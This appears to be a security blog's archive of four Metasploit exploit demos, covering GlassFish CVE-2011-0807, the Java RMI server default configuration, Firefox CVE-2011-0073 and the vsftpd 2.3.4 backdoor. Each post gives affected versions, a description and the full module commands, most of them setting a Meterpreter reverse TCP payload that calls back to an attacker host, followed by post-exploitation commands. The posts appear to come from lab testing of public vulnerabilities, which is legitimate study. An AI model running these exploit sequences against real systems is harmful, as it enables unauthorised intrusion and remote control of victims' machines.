Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2011-0807 : Sun/Oracle GlassFish Server Authenticated Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Jason Bowes and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2010-09-23
Coordinated public release of the vulnerability the 2011-04-19
Metasploit PoC provided the 2011-08-04

PoC provided by :

juan vazquez
Joshua Abraham
sinn3r

Reference(s) :

CVE-2011-0807
ZDI-11-137

Affected version(s) :

Sun GlassFish Enterprise Server 2.1, 2.1.1, 3.0.1
Java System Application Server 9.1

Tested on Windows XP SP3 with :

Sun GlassFish Enterprise Server 3.0.1

Description :

This module logs in to an GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads, and executes commands via deploying a malicious WAR. On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x this module will try to bypass authentication instead by sending lowercase HTTP verbs.

Commands :

use exploit/multi/http/glassfish_deployer
set RHOST 192.168.178.48
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Java RMI Server Insecure Default Configuration Java Code Execution

Exploits, Metasploit,

Timeline :

Vulnerability discovered by mihi
Metasploit exploit released the 2011-07-15

PoC provided by :

mihi

Reference(s) :

Oracle Java RMI documentation

Affected version(s) :

All JSE versions

Tested on Windows XP SP3 with :

JSE 7 (build 1.7.0-b147)

Description :

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

Commands :

On windows target box :

cd C:\Program Files\Java\jre7\bin
start rmiregistry.exe

On Metasploit box :

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.178.48
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability

Exploits, Metasploit,

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported to vendor by ZDI the 2011-02-02
Coordinated public release of advisory the 2011-05-09
Metasploit exploit released the 2011-07-10

PoC provided by :

regenrecht
xero

Reference(s) :

CVE-2011-0073
OSVDB-72087
ZDI-11-157
MFSA2011-13

Affected version(s) :

Firefox 3.6.16 and bellow
Firefox 3.5.18 and bellow
Seamonkey 2.0.13 and bellow

Tested on Windows XP SP3 with :

Firefox 3.6.9

Description :

This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x and 3.5.x found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it’s possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn’t employ any ASLR-free modules anymore.

Commands :

use exploit/windows/browser/mozilla_nstreerange
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

vsftpd v2.3.4 Backdoor Command Execution

Exploits, Metasploit,

Timeline :

Backdoor discovered by Mathias Kresin
Source code correction the 2011-07-03
Metasploit exploit released the 2011-07-04

PoC provided by :

hdm
mc

Reference(s) :

OSVDB-73573
Diff Pastbin
vsftpd alert

Affected version(s) :

vsftpd-2.3.4 from 2011-06-30 to 2011-07-03

Tested on Ubuntu Lucid 10.04.1 LTS with :

vsftpd-2.3.4

Description :

This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Commands :

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit

id
uname -a